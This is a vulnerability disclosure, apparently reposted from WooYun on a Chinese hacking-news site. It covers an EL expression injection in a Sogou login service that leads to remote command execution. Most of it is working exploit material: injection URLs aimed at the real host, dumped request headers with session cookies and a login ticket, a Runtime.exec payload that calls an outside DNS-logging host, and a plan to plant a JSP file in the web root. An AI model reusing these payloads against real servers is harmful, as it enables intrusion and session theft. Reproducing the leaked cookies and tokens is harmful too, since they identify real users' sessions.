记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狗某系统存在远程EL表达式注入漏洞(命令执行)

2016-06-02 11:45
漏洞标题 搜狗某系统存在远程EL表达式注入漏洞(命令执行)
相关厂商 搜狗
漏洞作者 猪猪侠
提交时间 2016-04-13 16:01
公开时间 2016-06-01 09:20
漏洞类型 命令执行
危害等级
自评Rank 20
漏洞状态 厂商已经确认
Tags标签

漏洞详情

#1 漏洞地址

https://auth.p4p.sogou.com/login?service=${1000-900}

https://auth.p4p.sogou.com/login?service=${pageContext}
action="[email protected] " method="post">

#2 表达式执行后的结果返回在页面

expcetion.png

获取web路径

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

file:/opt/local/resin/

https://auth.p4p.sogou.com/login?service=${requestScope}
{javax.servlet.jsp.jstl.fmt.locale=zh_CN, org.springframework.validation.BindingResult.credentials=org.springframework.webflow.mvc.view.BindingModel: 0 errors, flashScope=map[[empty]], flowExecutionUrl=/login?service=%5BLjava.lang.String%3B%40660b2cde, warnCookieValue=false, javax.servlet.forward.servlet_path=/login, org.springframework.web.servlet.support.RequestContext.CONTEXT=Flow ApplicationContext [login]: startup date [Tue Apr 12 21:38:02 CST 2016]; parent: WebApplicationContext for namespace 'eunomia-servlet', org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, caucho.forward=true, javax.servlet.forward.request_uri=/login, javax.servlet.forward.query_string=service=${requestScope}, loginTicket=LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m, javax.servlet.forward.context_path=, phoneValidationModel=com.sogou.bizdev.eunomia.validation.phone.Ph[email protected] , [email protected] [Attributes={}, targetRequestPath=null, targetRequestParams={}], flowRequestContext=[[email protected] externalContext = [email protected] 9d, currentEvent = viewAcountLogin, requestScope = map[[empty]], attributes = map[[empty]], messageContext = [[email protected] sourceMessages = map[[null] -> list[[empty]]]], flowExecution = [[email protected] flow = 'login', flowSessions = list[[[email protected] flow = 'login', state = 'accountViewLoginForm', scope = map['phoneValidationModel' -> [email protected] a91c3c, 'loginTicket' -> 'LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m', 'service' -> ${requestScope}, 'credentials' -> [username: null], 'warnCookieValue' -> false, 'ticketGrantingTicketId' -> [null], 'viewScope' -> map['commandName' -> 'credentials']]]]]], viewScope=map['commandName' -> 'credentials'], javax.servlet.jsp.jstl.fmt.localizationContext=org.springframewor[email protected] , [email protected] [email protected] ae, org.springframework.web.servlet.DispatcherServlet.CONTEXT=WebApplicationContext for namespace 'eunomia-servlet': startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER=[email protected] , flowExecutionKey=e110s1, service=${requestScope}, commandName=credentials, encodingFilter.FILTERED=true, credentials=[username: null]}

https://auth.p4p.sogou.com/login?service=${header}
{Upgrade-Insecure-Requests=1, Accept-Language=zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4, Cookie=SUV=1446734204911570; IPLOC=CN4401; SUID=BA5782774FC80D0A00000000563B6987; pgv_pvi=3484909568; sct=4; LSTMV=703%2C260; LCLKINT=108193; CXID=5CE9FE68778002DCEC30C2A9412EBA10; GOTO=; ad=3wENElllll2Q7p51lllllVtpqM7lllllNcJUWlllll9lllllxTDll5@@@@@@@@@@; _euid=75841017-9d86-4069-9421-d077bd8489ef; JSESSIONID=abcN1iKReDhPacJcOLoqv; session_id_agent_crm=8a089ef7-44bf-493b-81bc-45a327cf03ec, Host=auth.p4p.sogou.com, PROXY_ADDR=10.149.29.104, Accept-Encoding=gzip, deflate, sdch, X-Real-IP=119.130.85.119, X-Forwarded-For=*******, User-Agent=, Connection=close, Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8}

漏洞证明:

EL表达式参考

http://www.cnblogs.com/xdp-gacl/p/3938361.html

利用方式1

[email protected] @toString(@[email protected] ().exec(\u0027ifconfig\u0027).getInputStream())}

#3 执行命令

${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("dig sougou.99fd5e.dnslog.info",null).getInputStream())}

CloudEYE:

13-Apr-2016 18:42:50.858 queries: client 208.69.37.21#19674 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)
13-Apr-2016 18:42:53.876 queries: client 208.69.37.17#53756 (sougou.99fd5e.dnslog.info): query: sougou.99fd5e.dnslog.info IN A -E (128.199.200.236)

读取 ${sessionScope}, 获取a=InputStream的回显内容,[email protected]

获取WebROOT

https://auth.p4p.sogou.com/login?service=${applicationScope}

javax.servlet.context.tempdir=/opt/app/eunomia/WEB-INF/tmp,
org.springframework.web.context.WebApplicationContext.ROOT=Root WebApplicationContext

然后就用命令向这个目录/opt/app/eunomia/ 写jsp文件了

修复方案:

#4 校验客户端的变量

版权声明:转载请注明来源 猪猪侠@乌云

知识来源: www.secpulse.com/archives/47852.html

阅读:143330 | 评论:0 | 标签:漏洞 注入

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗某系统存在远程EL表达式注入漏洞(命令执行)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云